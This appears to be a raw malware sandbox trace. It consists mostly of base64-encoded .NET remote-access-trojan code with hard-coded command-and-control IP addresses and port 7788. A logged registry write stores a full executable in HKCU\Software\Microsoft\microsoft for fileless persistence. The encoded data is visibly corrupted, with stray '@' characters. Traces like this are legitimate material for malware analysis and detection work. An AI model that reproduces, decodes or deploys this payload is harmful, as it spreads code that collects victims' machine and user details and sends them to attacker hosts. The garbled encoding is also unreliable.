ABHwEGAEMBHwEKAGgBSgEWAIoBdQEGAKkBHwEKAMsBtQEKANMBtQEGAOcBbgAKACEC+gEGADACbgAOAFwCRAIKAGwC+gEGAJMCbgAGAMUCbgAKANIC+gEKAOoC+gEGABYDBgMGACIDBgMGAHEDbgAGAIEDCgAGAJ8DbgAGAM4DbgAGANQDbgAGAPcDbgAGAP@DbgAGACgEFgQGAEkEPwQOAFYEogAGAHsEbgAOAL8ErAQGABoFbgAOAB8FrAQGADQFHwEOAIgFrAQGAN4FbgAGAC4GbgAGAEoGNQYOAH@GcgYOAI@GcgYOAKcGcgYGAM@GwQYKANsGtQEKAO8GtQESABYHBAffADEHAAASAEwHBAcSAF@HBAcSAIgHBAcGAMMHbgAGAOgHwQYGACsIEAgGAEQIPwQOAGEISwgOAHkISwgGAKwIbgAAAAAAAQAAAAAAAQABAAABAAAPCQAADQABAAEAAQAQACYJLQkhAAEABQAFIQAAPwkAACEAFQAmAAABAABLCQAAIQAYACoAEwEAAGoJAAAJARoAKgATAQAAhwkAAAkBGgAqAAYAEgpTAgYAFQpWAgYAFwpTAgYAGgpWAgYAHQpZAgYAIApZAgYAJQpdAgYAJwpdAgYAKgpgAgYAMApgAgYANgpfAAYAOQpfAAYAPwpdAgYAQQpdAhYAQwpfABYARwpfABYASwpkAhYATwpoAhYAUgpfABYAVgpsAjYAxAvVAhYAxwvZAhYAzgvdAjMB+AvoAjMBIQzsAgAAAAADAAYYSgATAAEAAAAAAAMARgO9CUUCAwAAAAAAAwBGA+@JTQIFAAAAAAADAEYDCwoGAAYAgyAAAAAAERhZCkoABgC4IAAAAAAGGEoABgAGAIghAAAAABYAYApKAAYApCEAAAAABgBlCgYABgDcIQAASAAGAG@KBgAGAIAiAAAAAAYAcQoGAAYAtCIAAAAABgB1CnACBgD8KQAAAAAGAHwKdgIHAGAsAAAAAAYAkgqVAREAhCwAAAAABgCVCoQCEgDALAAAAAAGAJgKBgAVALA1AAAAAAYAnAqLAhUA3DUAAAAABgCfCnACFQBEOAAAAAAGAJ8KCgAWAFg4AAAAAAYApAqLAhcAAAAAAIAAESCnCo8CFwAAAAAAgAARIM@KowIfAAAAAACAABEg5QqnAh8AAAAAAIAAFiAFC7ACIgAAAAAAgAAWIEQLuwInALA4AAAAAAYAXQuSACgAIDkAAAAABgBhC5IAKACMOQAAAAAWAGYLDwAoACg6AAAAAAYAaQvAAigANDsAAAAABgB8C4sCKQCAOwAAAAAGAH8LkgApAMA7AAAAAAYAgwuxASkA4DsAAAAABgCIC7cBKgAAPAAAAAAGAIsLxQIrAKQ8AAAAAAYAkgvOAi@AND@AAAAABgCdC5UBLgBYPQAAAAAGAKoLlQEvAHo9AAAAAAEIsQsuATAAiD@AAAAABhhKAAYAMQCQPQAAAAARGFkKSgAxAJw9AAAAAAMI1gvhAjEAxz@AAAAAAwjpCwYAMwAAAAEAowkAAAIAsAkAAAEAyQkAAAIA2gkAAAEA9wkAAAEAegoAAAEAPwoAAAIAQQoAAAMAgAoAAAQAFQoAAAUANgoAAAYAggoAAAcAiAoAAAgAigoAAAkAjAoAAAoAkAoAAAEAkAoAAAEAQQoAAAIAgAoAAAMAkAoAAAEAegoAAAEAiAoAIAEApAoAIAIAwQoAAAMAwwoAAAQAPwoAAAUAxQoAAAYAxwoAIAcAyQoAAAgAywoAAAEA8woAAAIA+AoAAAMAAQsAAAEAHgsAIAIAJgsAAAMALwsAIAQANgsAAAUAPgsAAAEAVAsAAAEAdAsAAAEAhgsAAAEAegoAAAEAegoAAAIAjgsAAAEAdQoAAAEApAsAAAEApAsAAAEAwQsAAAEAwQsAAAIA5gsJAEoAAQARAEoABgAhAEoABgApAEoACgBBAEoABgBZAEoABgBhADYBBgB5AJYBDwBxAEoABgCBAEoAEwBpAEoAGQBpAEoAIACJAOEBJgCZAEoABgChADUCMABpAD4CBgBhAEoAQgC5AHgCSgBJAEoAEwB5AH8CTgC5AJ@CVAC5AK@CSgBpAL8CWgDJAMwCXwDRANwCYgDZAPYCaQDJAP8CbgDpACsDdQDRADcDeQDZAPYCfwDhAEkDhADpAFQDiwBBAPYCkgDZAF@DlgDZAGcDmwDZAPYCoADJAP8CpQChAHkDqwD5AJADvACpALEDwQDZAMMDyQD5AOcD@AAhAQUE2gApATEE4ADpADYE6AAxAUoABgA5AV4E7wA5AXAE9QBBAYIE+QDRAI4E/gDRAMoEBQHRAOEEeQDZAGcDDAHRAOsE/gDRAAsFeQDZAF@DEQHJACsFGQFhAUoAEwBpAEoAHgGhAE@FJQFpAD4CLgEJAVoFMwGhAGUFNwGhAHkFQgFpAUoABgBpAZIFAQBpAaUFAQBpAbUFAQBpAcgFAQDJAP8CUwHJAP8CWwFxAeoFDwBxAfoFDwBxAAcGkgBxABYGYQGBAVYGZQGBAWkGkgDJAFoFMwGJAYEGDwCJAZkGawGRAbEGcgEJAVQDeQGZAfYCkgCpAecGfgGxAfoGaQCJAP4GaQDRAUoACgDRAXYHgwG5AXoHiQHBAZ@HjwHZAakHlQEhAbIHEQHBAboHmgHhAc8HBgCpAdcHngHRAUoApQGhAUoAAQChAdsHMwGhAfYCkgDpAfEHqwHpAf@HsQHpAQYItwEUAEoABgAxATIIxQExATgIzQEUAEAI@gH5Ac8HBgAUADgI2AExAWwI3gEBAkoA4wEBAokI7gH5AY4IBgDpAZQIqwEhAZ@I9gEuABMA+QIuAAsA8AJDACMAEwJDABsADgKDABsADgKjABsADgLgAHMADgKgBBsADgKgBDMADgIABTMADgIvAKECMQChAjsAoQJHAKECSwChAgEAKwAAAAYAAQAGAAAABwAYAx4DOAM+A2oDdQN5A54DqQOzA7sDxgPTA9oD3wPjA/gDzAjVCNwI6QjvCPwIFgG9AUMBKQCrCgEAQwErANEKAgBGAS@A5QoCAEMBLwAFCwMAAAExAEQLBABQIAAAGABYIAAAGQAEgAAAAAAAAAAAAAAAAAAAAABKDAAAAgAAAAAAAAAAAAAA/AEGCQAAAAAIAAAAAAAAAAAAAAAFArUBAAAAAAIAAAAAAAAAAAAAAPwBbgAAAAAAAgAAAAAAAAAAAAAABQIEBwAAAAACAAAAAAAAAAAAAAD8AXUBAAAAAAQAAwAGAAUABwAFAAAAAAAAPE1vZHVsZT4AU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR@cmlidXRlAC5jdG9yAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR@cmlidXRlAFN5c3RlbQBNdWx@aWNhc3REZWxlZ2F@ZQBDb21waWxlckdlbmVyYXRlZEF@dHJpYnV@ZQBTeXN@ZW@uRGlhZ25vc3RpY3MARGVidWdnZXJEaXNwbGF5QXR@cmlidXRlAElBc3luY1Jlc3VsdABBc3luY@NhbGxiYWNrAE9iamVjdABFdmVudEhhbmRsZXIARXZlbnRBcmdzAERlYnVnZ2VySGlkZGVuQXR@cmlidXRlAFN5c3RlbS5UaHJlYWRpbmcATXV@ZXgAUmVsZWFzZU11dGV4AFRocmVhZABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBDb21wdXRlckluZm8AU3lzdGVtLldpbmRvd3MuRm9ybXMAQXBwbGljYXRpb24AZ2V@X@V4ZWN1dGFibGVQYXRoAFRocmVhZFN@YXJ@AE1pY3Jvc29mdC5WaXN1YWxCYXNpYwBTdHJpbmdzAENvbXBhcmVNZXRob2QAU3BsaXQAU1RBVGhyZWFkQXR@cmlidXRlAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAE5ld@xhdGVCaW5kaW5nAFR5cGUATGF@ZUNhbGwAU3RhcnQAU3lzdGVtLkNvZGVEb2@uQ29tcGlsZXIAQ29tcGlsZXJSZXN1bHRzAFByb2plY3REYXRhAEVuZEFwcABhZGRfQXBwbGljYXRpb25FeGl@AEV4Y2VwdGlvbgBTZXRQcm9qZWN@RXJyb3IAQ2xlYXJQcm9qZWN@RXJyb3IAU2xlZXAAU3RyaW5nAEVtcHR5AE9wZXJhdG9ycwBDb21wYXJlU3RyaW5nAENvbnZlcnNpb25zAFRvU3RyaW5nAENvbmNhdABNaWNyb3NvZnQuV2luMzIAUmVnaXN@cnlLZXkAUmVnaXN@cnkAQ3VycmVudFVzZXIAQ29uY2F@ZW5hdGVPYmplY3QAT3BlblN1YktleQBHZXRWYWx1ZQBUb@ludGVnZXIAVG9Cb29sZWFuAEJvb2xlYW4ATGF@ZUdldABSdW5@aW1lSGVscGVycwBHZXRPYmplY3RWYWx1ZQBSdW5@aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBDaGFuZ2VUeXBlAEFycmF5AFJ1bnRpbWVGaWVsZEhhbmRsZQBJbml@aWFsaXplQXJyYXkASW5@MzIAQ29udmVydABGcm9tQmFzZTY@U3RyaW5nAFN5c3RlbS5SZWZsZWN@aW9uAEFzc2VtYmx5AExvYWQAU2V@VmFsdWUAU3lzdGVtLklPAE1lbW9yeVN@cmVhbQBQcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAGdldF9IYW5kbGUASW5@UHRyAG9wX@V4cGxpY2l@AENvbmRpdGlvbmFsQ29tcGFyZU9iamVjdEVxdWFsAFN5c3RlbS5OZXQuU29ja2V@cwBTZWxlY3RNb2RlAENvbXBhcmVPYmplY3RMZXNzRXF1YWwAQW5kT2JqZWN@AENvbmRpdGlvbmFsQ29tcGFyZU9iamVjdEdyZWF@ZXIAU3VidHJhY3RPYmplY3QAQnl@ZQBTb2NrZXRGbGFncwBDb25@YWlucwBQYXJhbWV@ZXJpemVkVGhyZWFkU3RhcnQATGF@ZUluZGV4R2V@AGdldF9MZW5ndGgATGF@ZUluZGV4U2V@Q29tcGxleABMYXRlU2V@Q29tcGxleABUY3BDbGllbnQAc2V@X1JlY2VpdmVUaW1lb3V@AHNldF9TZW5kVGltZW91dABzZXRfU2VuZEJ1ZmZlclNpemUAc2V@X1JlY2VpdmVCdWZmZXJTaXplAEVudmlyb25tZW5@AGdldF9NYWNoaW5lTmFtZQBnZXRfVXNlck5hbWUAZ2V@X@9TRnVsbE5hbWUAZ2V@X1RvdGFsUGh5c2ljYWxNZW1vcnkAVUludDY@AFN5c3RlbS5HbG9iYWxpemF@aW9uAEN1bHR1cmVJbmZvAGdldF9DdXJyZW5@Q3VsdHVyZQBnZXRfTmFtZQBTeXN@ZW@uTmV@AERucwBHZXRIb3N@TmFtZQBJUEhvc3RFbnRyeQBHZXRIb3N@QnlOYW1lAElQQWRkcmVzcwBnZXRfQWRkcmVzc@xpc3QAU3lzdGVtLlRleHQAU3RyaW5nQnVpbGRlcgBJbnRlcmFjdGlvbgBFbnZpcm9uAENvbnZlcnNpb24ASGV4AFNwYWNlAFN5c3RlbS5NYW5hZ2VtZW5@AE1hbmFnZW1lbnRPYmplY3RDb2xsZWN@aW9uAE1hbmFnZW1lbnRPYmplY3RFbnVtZXJhdG9yAE1hbmFnZW1lbnRPYmplY3QATWFuYWdlbWVudE9iamVjdFNlYXJjaGVyAEdldABHZXRFbnVtZXJhdG9yAE1hbmFnZW1lbnRCYXNlT2JqZWN@AGdldF9DdXJyZW5@AGdldF9JdGVtAFRvSW5@MzIATW92ZU5leHQASURpc3Bvc2FibGUARGlzcG9zZQBJSWYAZ2V@X@NhcGFjaXR5AEVuY29kaW5nAGdldF9EZWZhdWx@AEdldEJ5dGVzAEdldFN@cmluZwBTeXN@ZW@uQ29sbGVjdGlvbnMuR2VuZXJpYwBMaXN@YDEAV3JpdGUAVG9BcnJheQBBZGQAU3RyZWFtAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBHWmlwU3RyZWFtAHNldF9Qb3NpdGlvbgBDb21wcmVzc2lvbk1vZGUAUmVhZABDbG9zZQBnZXRfVVRGOABUb@Jhc2U2NFN@cmluZwBWYWx1ZVR5cGUATnVjbGVhciBFeHBsb3Npb24uZXhlAGtlcm5lbDMyAHVzZXIzMgBhdmljYXAzMi5kbGwAcHNhcGkAa2VybmVsMzIuZGxsAG5@ZGxsLmRsbABtc2NvcmxpYgBWQiRBbm9ueW1vdXNEZWxlZ2F@ZV8wAEF@b21pYwBOdWNsZWFyX@V4cGxvc2lvbgBfQ2xvc3VyZSRfXwA8UHJpdmF@ZUltcGxlbWVudGF@aW9uRGV@YWlscz4AX19TdGF@aWNBcnJheUluaXRUeXBlU2l6ZT@@MwBfX1N@YXRpY@FycmF5SW5pdFR5cGVTaXplPTYAVGFyZ2V@T2JqZWN@AFRhcmdldE1ldGhvZABCZWdpbkludm9rZQBEZWxlZ2F@ZUNhbGxiYWNrAERlbGVnYXRlQXN5bmNTdGF@ZQBFbmRJbnZva2UARGVsZWdhdGVBc3luY1Jlc3VsdABJbnZva2UAT1cAQwBDbgBTQwBQVABJTlNUAEkATVMASG9zdHMAUG9ydHMASUQATVVURVgASABQAFNQTABBcHAAU@NHAERJAEtleQBNVAAuY2N@b3IATWFpbgBFeGVjdXRlAElOUwBQaW4AZGF@YQBiAElOVgBOAEJ5dGVzAFMATQBNRDUAQgBMQQBJUgBNQUMAQ@sAU2VuZABJUABHVkkAR2V@Vm9sdW1lSW5mb3JtYXRpb25BAFYAVABRAEcASgBYAEdGVwBHZXRGb3JlZ3JvdW5kV2luZG93AEdldFdpbmRvd1RleHQAaFduZABscFN@cmluZwBjY2gAY2FwR2V@RHJpdmVyRGVzY3JpcHRpb25BAHdEcml2ZXIAbHBzek5hbWUAY2JOYW1lAGxwc3pWZXIAY2JWZXIARW1wdHlXb3JraW5nU2V@AGhQcm9jZXNzAEhXRABDSVZDAE9QAEdldFByb2R1Y3QAUHJvZHVjdABNUABHQVcAU@IAcwBCUwBmeABXUkQARGVjb21wcmVzcwBFbmNvZGUASW5wdXQARGVjb2RlAF9MYW1iZGEkX19SMzItMgBhMAAkSQAkSTI@LTAAJElSMjQtMQBfTGFtYmRhJF9fUjI@LTEAYTEAX@xhbWJkYSRfXzI@LTAAMDNDN@Y@RThGQjM1OUFFQzBFRUYwODE@QjY2QTcwNEZDNDNGQjNBOAA1QjFFRTdDQUQzREZGMjIwQTk1RDFENkI5MTQzNUQ5RTE1MjBBQzQxAE51Y2xlYXIgRXhwbG9zaW9uAAARKgAtAF@ATgBLAFsALQAqAAEZYQBjAGgAaQBsAGwAZQBwAG8AdwBlAHIAADkxADkAMwAuADUANgAuADIAOAAuADEAMAAxACwAOQAxAC4AMQA5ADMALgA3ADUALgAxADUAOAAsAAADLAAAFTcANwA4ADgALAA3ADcAOAA4ACwAAAlVAG@ARQA9AAAfSwBhAHcAcgBIAEoAZgBXAGYAaABhAFIAQwBsAGcAAAtTAHQAYQByAHQAAAdQAE4AQwAAA1AAAANXAAAFSQBFAAATUwBvAGYAdAB3AGEAcgBlAFwAAANcAAADXwAAN@gASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAAAHRwBQAEwAAAVMAFAAAAdVAE4AVgAAHUMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAAB1UATgBJAAABAAMuAAANQwBsAGkAZQBuAHQAABNDAG8AbgBuAGUAYwB@AGUAZAAACVAAbwBsAGwAABNBAHYAYQBpAGwAYQBiAGwAZQAAD1IAZQBjAGUAaQB2AGUAAAtXAHIAaQB@AGUAAA9UAG8AQQByAHIAYQB5AAAPRABpAHMAcABvAHMAZQAADWwAZQBuAGcAdABoAAAVRABpAHMAYwBvAG4AbgBlAGMAdAAAD@MAbwBuAG4AZQBjAHQAAAlTAGUAbgBkAAAXSQBuAGYAbwByAG@AYQB@AGkAbwBuAAAHIAAvACAAAAMgAAA9UwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAEEAbgB@AGkAVgBpAHIAdQBzAFAAcgBvAGQAdQBjAHQAADtTAEUATABFAEMAVAAgACoAIABGAFIATwBNACAARgBpAHIAZQB3AGEAbABsAFAAcgBvAGQAdQBjAHQAAAtGAGEAbABzAGUAAAkyADUAMAAwAAAdUwBlAG4AZABCAHUAZgBmAGUAcgBTAGkAegBlAAANTABlAG4AZwB@AGgAAAk/AD8APwA/AAAXUwB5AHMAdABlAG@ARAByAGkAdgBlAAAHRQBSAFIAAAdZAGUAcwAABU4AbwAAO3MAZQBsAGUAYwB@ACAAKgAgAGYAcgBvAG@AIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAAGUEAZABkAHIAZQBzAHMAVwBpAGQAdABoAAAncgBvAG8AdABcAFMAZQBjAHUAcgBpAHQAeQBDAGUAbgB@AGUAcgAABVgAUAAAAzIAABdkAGkAcwBwAGwAYQB5AE4AYQBtAGUAAAdOAC8AQQAAgINIAEsARQBZAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBcAEgAQQBSAEQAVwBBAFIARQBcAEQARQBTAEMAUgBJAFAAVABJAE8ATgBcAFMAWQBTAFQARQBNAFwAQwBFAE4AVABSAEEATABQAFIATwBDAEUAUwBTAE8AUgBcADAAACdQAHIAbwBjAGUAcwBzAG8AcgBOAGEAbQBlAFMAdAByAGkAbgBnAAAAAJYwqmwElwBLiYiNxlAWgnQABCABAQgDIAABBCABAQ4DAAAOBSACARwYBiACARJBCAUgAQESQQkABB@ODg4IEUkRAAgcHBJVDh@cHQ4dElUdAgIHIAMBAg4QAgMAAAEFAAEBEiUFAAEBEmEEAAEBCAIGDgYAAwgODgIEAAEOCAYAAw4ODg4DBhJxBQACHBwcBAABDhwGIAIScQ4CBgADHA4OHAMgAA4EAAEIDgQAAQIOBAABDgIFAAEOHQ4QAAccHBJVDh@cHQ4dElUdAgQAARwcBwABElURgIEGAAIcHBJVCQACARKAhRGAiQUAAR@FDgcAARKAlR@FBgADAQ4OHAUAABKAnQMgABgEAAEKGAYAAwIcHAIGAAMcHBwCBAABAhwEAAEIHAIdBQQgAQIOBiABARKAsQgAAxwcHRwdDgQgAQEcAyAACAoABQEcHRwdDgICEAAIARwSVQ4dHB@OHRJVAgIHAAQODg4ODgUAAg4ODgMgAAsFAAASgMEGAAESgMkOBiAAHRKAzQQgARwIBAABDg4FIAASgN@FIAASgOEFIAASgO@EIAEcDgMgAAIGAAMcAhwcBSACAQ4OBQAAEoD1BSABHQUOBSABDh@FBxUSgPkBHQUHIAMBHQUICAQgAB@FBSABARMABSAAHRMABCABAQoKIAMBEoD9EYEFAgcgAwgdBQgIBQABDh@FCLd6XFYZNOCJCLA/X38R1Qo6BAEAAAAxAQASPGdlbmVyYXRlZCBtZXRob2Q+AQBUDgRUeXBlEjxnZW5lcmF@ZWQgbWV@aG9kPgcgAhIZEh@cBSABARIZAgYCAgYcAwYSNQIGCAMGHQ4DBhIMAwYSOQMGEjEFIAEBHQUNIAocDg4ODg4OCAIOAgYgAxwODg4DIAAcEQAICBAOEA4IEAgQCBAIEA4IASIDAAAYCAADCBgSgNEICgAFAgYQDggQDggEAAECCgQgAQ4OCCACEoCFHQUOBiABHQUdBQMGEhADBhIIAwYSJQYgAgEcEikDBhEcAwYRGAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEFBwMOAgIZBxAOAhwcElkdDh@OCAgCHQ4dDggIEjUSNQUHAgIQCCsHGB@OAgICAgICEA4QDhAOEA4QDhAOEA4QDhAOEA4QDh@cHQIQDh@cHQIcCgcGHB@cHQICAgIDBwEcJAcYHAgCAgICAgICHQUdHB@CAhKAhRI1AhKAhRwcCAgQDhAOAgoHBgIcHRwdAhwcCQcHDggODggIDgcHBQ4IAg4OCgcEDhKA4RKA5QIMBwYODhKA4RKA5QICBgcCDhKA@QQHAR@FAwcBDhQHBRKAhRUSgPkBHQUSgJkSgJkdDhEHBx@FEoCZEoEBEoCZHQUIAgAAxF@AAAAAAAAAAAAA3l@AAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAANBdAAAAAAAAAAAAAAAAX@NvckV4ZU1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACBAAAAAAAAAAAAAAAAAAABQAAAMAAAA8D@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
regkey_r: microsoft
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\microsoft
success 0 0
1619832785.562124
RegSetValueExA
key_handle: 0x00000310
value: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM@hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ@KJAAAAAAAAABQRQAATAECAPfDAl8AAAAAAAAAAOAAAgELAQgAAD4AAAACAAAAAAAA7l@AAAAgAAAAYAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAIAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJxdAABPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC5@ZXh@AAAA9D@AAAAgAAAAPgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAAAAAIAAABAAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQXQAAAAAAAEgAAAACAAUA2D@AAMQfAAABAAAABwAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAQEBAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAc5yAQAAcIAPAAAEKAgAAAqAEAAABHMGAAAGgBEAAARzCQAACoASAAAEchMAAHCAEwAABCoAAzAFAMMAAAAAAAAAAigFAAAKAAIWfQEAAAQCFH@CAAAEAhZ9AwAABAIC/gYPAAAGcwoAAAoXcwsAAAp9BAAABAIC/gYKAAAGcwoAAApzDAAACn@FAAAEAgL+BgkAAAZzCgAACnMMAAAKfQYAAAQCF3@HAAAEAhZ9CAAABAJyLQAAcHJnAABwFRYoDQAACn@JAAAEAnJrAABwcmcAAHAVFigNAAAKfQoAAAQCcoEAAHB9CwAABAJyiwAAcH@MAAAEAhZ9DQAABAIWfQ4AAAQqABMwBAAQAAAAAQAAEQAAAAB+EQAABG8IAAAGACraAAJ7BAAABBRyqwAAcBaNCAAAARQUFBcoDwAACiYCewUAAARvEAAACgACewYAAARvEAAACgAqABswCACIAAAAAgAAEQAAAAAXAnsMAAAEAnwBAAAEcxEAAAqAFAAABAJ7AQAABBb+AQsHLDAoEgAACgB+FwAABCwHfhcAAAQrFn4VAAAE/gYoAAAGcxMAAAolgBcAAAQoFAAACgDeDSgVAAAKACgWAAAK3gAAILiIAAAoFwAACgB+GAAACgoAAAAAAAAAAAAAAAAAACoBEAAAAAADAFdaAA@YAAABEzADACcAAAADAAARAAACewcAAAQW/gEKBiwOAnwIAAAEJQsHShfWVAAAFygXAAAKACvaABswDAAsBwAABAAAEQACAyggAAAGfhMAAAQVFigNAAAKCgYWmnK3AABwFigZAAAKFv4BCwcsGQIWfQcAAAQCcrcAAHAoEgAABgAAOOgGAAAGFppyvwAAcBYoGQAAChb+AQwILFECF3@HAAAEAnK/AABwfhMAAAQCewgAAAQoGgAACigbAAAKKBIAAAYAAhZ9CAAABAJywwAAcH4TAAAEAigeAAAGKBsAAAooEgAABgAAOIIGAAAGFppyxwAAcBYoGQAAChb+AQ@JOZUBAAB+HAAACnLNAABwAgJ7DAAABCgjAAAGKB@AAApy4QAAcCgdAAAKBheaKB@AAAooHgAAChdvHwAAChT+AxMEEQQ5AgEAAAACAnsJAAAEAnsNAAAEmgJ7CgAABAJ7DgAABJoGGpoGG5oCAgJ7CwAABCgkAAAGcuUAAHAoHQAACgIoGQAABigdAAAKKB4AAAooIwAABigeAAAKcukAAHACAnsMAAAEKCMAAAYoHQAACnLhAABwKB@AAAoGF5ooHQAACigeAAAKBheaFCggAAAKbyEAAAoGGJooIgAACgYZmigjAAAKBheaFygMAAAGJt5UKBUAAAoAAh2NGQAAASUWciEBAHCiJRd+EwAABKIlGAYbmqIlGX4TAAAEoiUaBheaoiUbfhMAAASiJRwWKCQAAAqiKCUAAAooEgAABgAoFgAACt4AAAArSQACHY@ZAAABJRZyIQEAcKIlF34TAAAEoiUYBhuaoiUZfhMAAASiJRoGF5qiJRt+EwAABKIlHBYoJAAACqIoJQAACigSAAAGAAAAONUEAAAGFppyKQEAcBYoGQAAChb+ARMFEQUsfAICewkAAAQCew@AAASaAnsKAAAEAnsOAAAEmgYXmgYYmgICAnsLAAAEKCQAAAZy5QAAcCgdAAAKAigZAAAGKB@AAAooHgAACigjAAAGKB4AAAoGGZoGGpooIgAACgYbmigjAAAKBhyaBh2aKCMAAAooDAAABiYAOEIEAAAGFppyLwEAcBYoGQAAChb+ARMGEQY5KAQAAAIGF5ooDQAABhRyNwEAcBeNCAAAASUWBhiPGQAAASUTFFCiJRMVFBQXjR4AAAElFhecJRMWKCYAAAoTFxEWFpEtAisgERQRFRaaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVERFxRyVQEAcB8rjQgAAAElFgICewwAAAQoIwAABqIlFwYZjxkAAAElEwdQoiUYcl@BAHCiJRlyXQEAcKIlGnJdAQBwoiUbcl@BAHCiJRxyXQEAcKIlHXJdAQBwoiUecl@BAHCiJR8Jcl@BAHCiJR8Kcl@BAHCiJR8Lcl@BAHCiJR8Mcl@BAHCiJR8Ncl@BAHCiJR8Ocl@BAHCiJR8Pcl@BAHCiJR8Qcl@BAHCiJR8Rcl@BAHCiJR8Scl@BAHCiJR8Tcl@BAHCiJR8Ucl@BAHCiJR8Vcl@BAHCiJR8Wcl@BAHCiJR8Xcl@BAHCiJR8Ycl@BAHCiJR8Zcl@BAHCiJR8acl@BAHCiJR8gBhqPGQAAASUTCFCiJR8hBhuPGQAAASUTCVCiJR8ifhAAAASiJR8jBhyPGQAAASUTClCiJR8kBh2PGQAAASUTC1CiJR8lBh6PGQAAASUTDFCiJR8mBh8JjxkAAAElEw1QoiUfJwYfCo8ZAAABJRMOUKIlHygGHwuPGQAAASUTD1CiJR8pBh8MjxkAAAElExBQoiUfKgYfDY8ZAAABJRMRUKIlExIUFB8rjR4AAAEl@BkAAAQoKgAACiUTExcoDwAACiYRExeRLQIrIBEHERIXmignAAAK@BkAAAEoKAAACigpAAAKdBkAAAFRERMfIJEtAishEQgREh8gmignAAAK@BkAAAEoKAAACigpAAAKdBkAAAFRERMfIZEtAishEQkREh8hmignAAAK@BkAAAEoKAAACigpAAAKdBkAAAFRERMfIpEtAisjERIfIpooJwAACtAZAAABKCgAAAooKQAACnQZAAABgBAAAAQREx8jkS@CKyERChESHyOaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8kkS@CKyERCxESHySaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8lkS@CKyERDBESHyWaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8mkS@CKyERDRESHyaaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8nkS@CKyERDhESHyeaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8okS@CKyERDxESHyiaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8pkS@CKyEREBESHymaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEREx8qkS@CKyERERESHyqaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAAVEAKgEQAAAAAAUBqq8BVBgAAAEbMAkARgIAAAUAABEAAg4GKA@AAAYUcjcBAHAYjQgAAAElFgVyXwEAcA4EKBsAAAqiJRcXjB4AAAGiFBQUKCYAAAoUcqsAAHAcjQgAAAElFg4FoiUXDgeMIwAAAaIlGAOiJRkEoiUafhMAAASiJRt+DwAABKIlCxQUHI@eAAABJdAYAAAEKCoAAAolDBcoDwAACiYIFpEtAiseBxaaKCcAAArQGQAAASgoAAAKKCkAAAp@GQAAARAFCBeRLQIrHgcXmignAAAK@CMAAAEoKAAACigpAAAKpSMAAAEQBwgYkS